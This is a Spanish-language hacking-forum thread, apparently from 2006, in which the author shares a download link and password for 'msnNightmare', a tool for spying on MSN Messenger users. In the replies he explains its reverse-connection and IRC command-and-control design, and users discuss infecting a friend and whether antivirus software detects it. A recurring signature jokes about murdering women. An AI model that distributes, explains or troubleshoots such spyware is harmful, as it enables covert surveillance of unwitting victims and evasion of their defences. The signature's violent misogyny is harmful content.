Tema destacado: Recuperar cuenta de Google, GMail, Youtube
Autor
|
Tema: msnNightmare gratis (Leído 14,271 veces)
|
|
MazarD
|
Pues eso, que dicen que lo prometido es deuda  Aquí teneis el link de descarga: http://www.mazard.info/msnNightmare.rarDadle a guardar destino como o entrais y guardais la pagina como msnNightmare.rar La contraseña para descomprimirlo es "elhacker.net" A ver cuando tengo un poco de tiempo y público el código fuente también. Ya he sacado un nuevo programa en mi web, por si a alguien le interesa http://www.mazard.infoSaludos
|
|
|
|
« Última modificación: 21 Diciembre 2006, 15:22 por MazarD »
|
|
|
|
|
Dahmer
Catch the rainbow!!!!!!!!!
|
|
|
|
|
|
|
|
|
|
usuarioinvitado
Visitante
|
gracias
|
|
|
|
|
|
|
|
|
OzX
[NuKe] Team
|
buen aporte men¡¡¡ feliciotaciones por el soft..
|
|
|
|
|
|
|
|
|
|
|
㋡
Soy como una droga que te impone su verdad!
|
hi oye brother no púedo descargar el soft, lo guarde como indicas pero marka Rar!Ιs€ 8 ™Œná„|uweð˳”…3®bPïÇ]Ë_bÄ£¾’LÐïPå ÷Eô_“ÝQà Ÿ·ÙäÕï8 ™Œná„ÃÁý¡§\KÿòõbÑÊAøò—»…Œ2–”˦.ýóŠ¾à¬½âì Ì«gïR8ñöȹ÷Óózi÷̾ålô«¡™t.Á5ÓJÚ(NdÒ‘)¬sÄe" rˆ³¼qHù[i¶[WO*.Ñ©”¿©ö¾ÅroFƒc½më‹EGéw§ðû)¦´Óê`hçlm˜·ð(M $jÆÚ¦bHP·ÆÅyŒ+Á˜#|P—~u&>1?&S@Öº¶Ž½IF\^ùm.Óâ–ÍocÞY|PLe“ßX3d! ¥X52$À)üãÆ@e579qoÞ¹µ²…«è¼Ó$ÚïL4ͧh¾óK%£å# ñ“šÄšªƒ:8ÌÚ#ÏÓSÐü*6…k[~æ’·´@WPø¤~\øÇ ®Ýw›ý 8»`Áùÿ4uû@g^©ÀL²F&#§ y mucho mas cuando lo guardo como rar me indica que esta dañado o k tiene un formato deskonocido al ingresar a tu page me pide un codigo para SMS pero ps dice k el servicioo no esta disponible para mexico 
|
|
|
|
|
|
que tan enfermo quieres quedar hoy?
La única manera de estar totalmente seguro de ser el primero en algo, en la vida de una mujer, es asesinarla.
PD:Piénsalo y me avisas.
|
|
|
㋡
Soy como una droga que te impone su verdad!
|
hi sorry ya pude brother gracias un comentario y si kisiera descargar los demas soft k tienes? comentaba aca arriba que el servicio de SMS no esta disponiible para mexico  alguna alternativa bro??
|
|
|
|
|
|
que tan enfermo quieres quedar hoy?
La única manera de estar totalmente seguro de ser el primero en algo, en la vida de una mujer, es asesinarla.
PD:Piénsalo y me avisas.
|
|
|
Albus Severus A.
"Severus...please..."
|
Oye mazard, de nueva cuenta, tengo problemas con el msnNightmare, le pase un server a una amiga, y si funciono, me lo ponia como conectado, pero al momento de darle doble click, en la ventana para espiar no podia hacer nada, me decia que estaba deconectado, y el msn messenger de mi amiga se cerraba a cada rato, que hice mal amigo?
Y por cierto, me insteresa otro de tus programas, pero va de nuevo la pregunta, como le hago para conseguirlo? soy de mexico.
Lo que se de cada quien tus programas son innovadores y a veces necesarios, estupendo aporte Mazard.
Saludos, y espero contestes rapido, chao.
|
|
|
|
|
|
La curiosidad mato al hacker
|
|
|
|
MazarD
|
El enlaze si funciona, Dadle boton derecho sobre el link y guardar destino como. Gracias Palac, necesarios nunca són éste tipo de programas pero innovadores yo diria que sin duda  Te has leido el leeme.txt? Has abierto el puerto 6611 de tu router? Después de hacer doble click sobre el conectado espera unos 5 o 10 segundos y luego dale a "empezar"
|
|
|
|
|
|
|
|
|
Snak3
|
Muy buen programa. Ahora una pregunta este program es d conexión inversa? y si lo es funka con no-ip? mm bueno eso XD vale de antemano 
|
|
|
|
|
|
|
|
|
|
MazarD
|
Si es de conexión inversa pero pensé que para facilitar las cosas era mejor pensar en montar algún sistema para no tener que meter ips ni ddns.
Lo que hace es conectar a mazard.no-ip.org que apunta a veces a mi servidor de irc y otras veces a servidores públicos de irc (depende de si tengo el pc up o no)
Entonces, el cliente conecta al server de irc y busca a sus servidores (la lista de desconectados) cuando encuentra a uno aparece en la lista de conectados, al hacer doble click encima de un "conectado" lo que hace es enviar la ip automaticamente para que conecte a tu pc con conexión inversa, por eso es necesario abrir el puerto. Para modificar la ip que se envia en lugar de detectarla automaticamente puedes entrar en "modo avanzado" y donde pone mi ip es:77.77.77.77 o lo que sea cambiarlo por Mi ip es:tumismo.no-ip.org o lo que sea.
Para evitar que alguien que entre pueda enviar la ip a cualquiera para que conecte y espiar monte otra idea, el cliente y los infectados utilizan nicks aleatorios y solo hacen caso al nick concreto. No hay forma de identificar que infectado corresponde a que cliente y solo saben el nick aleatorio que les corresponde ellos mismos.
|
|
|
|
|
|
|
|
|
|
~~
|
Muxas gracias MazarD Esta muy bien tu programa Felicidades 
|
|
|
|
|
|
|
|
|
Snak3
|
gracias por la respuesta a mi duda men ahora lo entiendo todo mmm eso xD y muy buen programa el kav no lo detecta??? q antivirus no lo detectan?
|
|
|
|
|
|
|
|
|
Alert
|
hola muy buenas, yo tengo una pregunta, una vez abierto el puerto es darle al exe y que mas he de hacer? abrir mi msn y saldran opciones?. Saludos y gracias
|
|
|
|
|
|
|
|
|
|
|
|